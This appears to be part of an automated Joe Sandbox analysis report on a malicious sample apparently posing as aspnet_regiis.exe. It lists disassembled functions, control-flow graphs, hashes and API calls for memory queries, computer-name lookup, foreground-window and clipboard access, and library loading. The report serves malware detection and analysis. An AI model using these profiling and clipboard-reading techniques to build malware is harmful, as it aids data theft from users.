                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                              • String ID: b]u)$}$}
                                                                                                                                                                                                                                              • API String ID: 3676751680-2900034282
                                                                                                                                                                                                                                              • Opcode ID: 01bf413a82cac4f2cb28100926ba03fbfcf0c592c6adf4d66b2537c6f1fc0c2d
                                                                                                                                                                                                                                              • Instruction ID: 7c36a2c56b07705ea1e7d7fdaef0cae537cb7bae96adcd75ec73db4e1aa8cc05
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01bf413a82cac4f2cb28100926ba03fbfcf0c592c6adf4d66b2537c6f1fc0c2d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0C1F673E187144BC708DF69D84125AF7D6ABC8710F0EC52EA898EB351EA78DD048BC6
                                                                                                                                                                                                                                              Function 0074D34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1296 74d34a-74d362 1297 74d370-74d382 1296->1297 1297->1297 1298 74d384-74d389 1297->1298 1299 74d39b-74d3a7 1298->1299 1300 74d38b-74d38f 1298->1300 1302 74d3c1-74d40f call 75fe00 GetPhysicallyInstalledSystemMemory 1299->1302 1303 74d3a9-74d3ab 1299->1303 1301 74d390-74d399 1300->1301 1301->1299 1301->1301 1308 74d410-74d44d 1302->1308 1305 74d3b0-74d3bd 1303->1305 1305->1305 1307 74d3bf 1305->1307 1307->1302 1308->1308 1309 74d44f-74d498 call 73e960 1308->1309 1312 74d4a0-74d551 1309->1312 1312->1312 1313 74d557-74d55c 1312->1313 1314 74d57d-74d583 1313->1314 1315 74d55e-74d568 1313->1315 1317 74d586-74d58e 1314->1317 1316 74d570-74d579 1315->1316 1316->1316 1318 74d57b 1316->1318 1319 74d590-74d591 1317->1319 1320 74d5ab-74d5b3 1317->1320 1318->1317 1323 74d5a0-74d5a9 1319->1323 1321 74d5b5-74d5b6 1320->1321 1322 74d5cb-74d611 1320->1322 1324 74d5c0-74d5c9 1321->1324 1325 74d620-74d653 1322->1325 1323->1320 1323->1323 1324->1322 1324->1324 1325->1325 1326 74d655-74d65a 1325->1326 1327 74d65c-74d65d 1326->1327 1328 74d66d 1326->1328 1329 74d660-74d669 1327->1329 1330 74d670-74d67a 1328->1330 1329->1329 1331 74d66b 1329->1331 1332 74d67c-74d67f 1330->1332 1333 74d68b-74d73c 1330->1333 1331->1330 1334 74d680-74d689 1332->1334 1334->1333 1334->1334
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0074D3EE
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                              • String ID: ><+
                                                                                                                                                                                                                                              • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                              • Opcode ID: 584c3a034909a9cbae7d827595797129ea116f9af029e91f8489cfb80e232744
                                                                                                                                                                                                                                              • Instruction ID: 14292a18f56717f549c806981e73528c3246c7e51c8066ed6dc420073e0a1ed3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 584c3a034909a9cbae7d827595797129ea116f9af029e91f8489cfb80e232744
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CC1D1756047818FD725CF2AC490762FBE2BF9A310F29859DC4DA8B792C739E806CB50
                                                                                                                                                                                                                                              Function 00760D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @Ukx$
                                                                                                                                                                                                                                              • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                              • Opcode ID: 026b607482578f1019abe5e46be1872548a1e29201f821c014a05b659442353d
                                                                                                                                                                                                                                              • Instruction ID: 0f46cd281f8ac787a4069f7b9ccceb0cbbe6edb1e7b44d1faa626cc3251d9b00
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 026b607482578f1019abe5e46be1872548a1e29201f821c014a05b659442353d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2B14532B087504BC728CE28D8D52ABB7A2EBC5314F1DCA3CDD975B395DA399C058B91
                                                                                                                                                                                                                                              Function 0075E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0076148A,00000002,00000018,?,?,00000018,?,?,?), ref: 0075E13E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                              Function 00747440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: _^]\
                                                                                                                                                                                                                                              • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                              • Opcode ID: c1e0b65b52bd6cc254146d12dea5bcf22822990074bc5839f54ce0563f909ad6
                                                                                                                                                                                                                                              • Instruction ID: 2884cda12d421904cd04ed16978f01c895a064f56fb8cf9afbb2228bb5028a21
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1e0b65b52bd6cc254146d12dea5bcf22822990074bc5839f54ce0563f909ad6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED7126B1A0C3005BD71C9E28DC92B7BB6A2DF81318F19883CE4869B292E37CDC15C756
                                                                                                                                                                                                                                              Function 00761720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: =<32
                                                                                                                                                                                                                                              • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                              • Opcode ID: e9baa35bf90bcf2afab3228fd7698d483301c12e6d1c6e14e4e41388649c6bb7
                                                                                                                                                                                                                                              • Instruction ID: 0a30d7b931f42d0a339c5be185d048529e62c3664ebdd53c7235d11cfb58299d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9baa35bf90bcf2afab3228fd7698d483301c12e6d1c6e14e4e41388649c6bb7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43314834604305ABE7149E14DC95B7FB3A5EB84760F5C852CED86972E0D778DC809782
                                                                                                                                                                                                                                              Function 00741A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ,-
                                                                                                                                                                                                                                              • API String ID: 0-1027024164
                                                                                                                                                                                                                                              • Opcode ID: 772652a312bc01ea33eb150ba92d2694d37d3bfd7bdd312528b1b0a6296dc8da
                                                                                                                                                                                                                                              • Instruction ID: 2bde2d3c8e733567f3868ddba02a77613ace95a2600cbae71d26fe70d6801272
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 772652a312bc01ea33eb150ba92d2694d37d3bfd7bdd312528b1b0a6296dc8da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 052137A1A15300CBC714AF29CD52537B7B1EF82361F89C618E4968B351F778CD45C7A2
                                                                                                                                                                                                                                              Function 00760340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                              • Opcode ID: a65b8c1dde3c5ee8c3ab5f10e2118beb55ac1d23edcd2cbd321e38be4076f717
                                                                                                                                                                                                                                              • Instruction ID: 344e78634db6e978fb65e4565f8591c19a025dccd7c1226a56fa01c4f10d41ab
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a65b8c1dde3c5ee8c3ab5f10e2118beb55ac1d23edcd2cbd321e38be4076f717
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E53103715083049BC324DF58D8D166FBBE4EBC5314F14892CEA9A93290D7799848CB96
                                                                                                                                                                                                                                              Function 0072CC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: EnvironmentExpandStrings$Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1780199113-0
                                                                                                                                                                                                                                              • Opcode ID: 7d58e1fc67e67b15ccb894f96cddb4e2a0d9e3a802dbecf1aa0bd2f08b47c081
                                                                                                                                                                                                                                              • Instruction ID: 575e99e5ebc3563198b2296325e79af44e1760d76e0eafd45fa3b48a8845d30e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d58e1fc67e67b15ccb894f96cddb4e2a0d9e3a802dbecf1aa0bd2f08b47c081
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23314EE9B01250ABE90576313C6BA7F61575BD0718F0C142CF50B27383EE6EF916A197
                                                                                                                                                                                                                                              Function 00728A50 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                              • Instruction ID: c5a7daae527b77246c27beb81b28209e5ada635ad548018f072646a3453ede13
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de8a8dcc9c3ab3076e5cd776fb6cd32bc0718f272d39d571d2e216b7fbce9e89
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6021C537A627184BD3108E54DCC97917761E7D9328F3E86B8C9249F3D2C97BA91386C0
                                                                                                                                                                                                                                              Function 00729D1E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142libraryCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1255 729d1e-729d34 1256 729d40-729d52 1255->1256 1256->1256 1257 729d54-729d7e 1256->1257 1258 729d80-729d92 1257->1258 1258->1258 1259 729d94-729e13 LoadLibraryExW call 75d960 1258->1259 1262 729e20-729e32 1259->1262 1262->1262 1263 729e34-729e5e 1262->1263 1264 729e60-729e72 1263->1264 1264->1264 1265 729e74-729e80 LoadLibraryExW call 75d960 1264->1265 1267 729e85-729e98 1265->1267
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000), ref: 00729D98
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000), ref: 00729E78
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                              • String ID: CK{
                                                                                                                                                                                                                                              • API String ID: 1029625771-1506268401
                                                                                                                                                                                                                                              • Opcode ID: cd21534984915b12ec73a2ba147000f03e8ef6e8819d34489054e5d826f117be
                                                                                                                                                                                                                                              • Instruction ID: 2fe5fdc2cc001203619e3caef31d9a999e6f4c33bb4304f968fa205f3acb91e6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd21534984915b12ec73a2ba147000f03e8ef6e8819d34489054e5d826f117be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5412274D003409FE7249F7898D6A9A7F71FB06324F40429CD4902F3A6C735980ACBE2
                                                                                                                                                                                                                                              Function 0074D7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1268 74d7ee-74d7f3 1269 74d7f5-74d7f9 1268->1269 1270 74d813-74d819 1268->1270 1271 74d800-74d809 1269->1271 1272 74d896-74dbfb FreeLibrary call 75fe00 1270->1272 1271->1271 1274 74d80b-74d80e 1271->1274 1277 74dc00-74dc12 1272->1277 1274->1272 1277->1277 1278 74dc14-74dc19 1277->1278 1279 74dc2d 1278->1279 1280 74dc1b-74dc1f 1278->1280 1281 74dc30-74dc72 GetComputerNameExA 1279->1281 1282 74dc20-74dc29 1280->1282 1282->1282 1283 74dc2b 1282->1283 1283->1281
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0074D898
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0074DC43
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                              • String ID: ;87>
                                                                                                                                                                                                                                              • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                              • Opcode ID: cb1520372f8f11990b06f7b0fcdc34c695a173f1f037521cdb5d811bb5e2f447
                                                                                                                                                                                                                                              • Instruction ID: 5a2cdd8fc2e61618275f792877bc01d5a721f6ad13f767cd19c963ab57ad68be
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb1520372f8f11990b06f7b0fcdc34c695a173f1f037521cdb5d811bb5e2f447
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA21C4B1504742CFDB328F25D850726BFE2AF57301F18C699D4D68B292DB789C42CB61
                                                                                                                                                                                                                                              Function 0074D893 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1284 74d893-74dbfb FreeLibrary call 75fe00 1289 74dc00-74dc12 1284->1289 1289->1289 1290 74dc14-74dc19 1289->1290 1291 74dc2d 1290->1291 1292 74dc1b-74dc1f 1290->1292 1293 74dc30-74dc72 GetComputerNameExA 1291->1293 1294 74dc20-74dc29 1292->1294 1294->1294 1295 74dc2b 1294->1295 1295->1293
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0074D898
                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0074DC43
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                              • String ID: ;87>
                                                                                                                                                                                                                                              • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                              • Opcode ID: 8075a18870f393edfec174d046d159a1d9a44367e7f24b1d974889eb2462fe44
                                                                                                                                                                                                                                              • Instruction ID: d97b691f351a3c9ba1ed21fd5849f325182b8eee28eec304362fbd7178479d37
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8075a18870f393edfec174d046d159a1d9a44367e7f24b1d974889eb2462fe44
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E911C8B1501742CFD7218F35DC50766BBE2EF47311F19C694D4D68B292EB789841CB51
                                                                                                                                                                                                                                              Function 0075E34B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0075E3BA
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2020703349-3019521637
                                                                                                                                                                                                                                              • Opcode ID: c966422e33c375d5dd9c6372cd45a0accf2ba44c38ce344de297d6daaa52b23b
                                                                                                                                                                                                                                              • Instruction ID: 086470e005cdf95a4dcdab8bb7bfad4d0100560b4fa50134fbbafb774d9bcc2a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c966422e33c375d5dd9c6372cd45a0accf2ba44c38ce344de297d6daaa52b23b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42112B76E409554BDF08CB79DC171EA77A2B7C432572D86B9CC17E3290DA7C49068A84
                                                                                                                                                                                                                                              Function 0072EF53 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
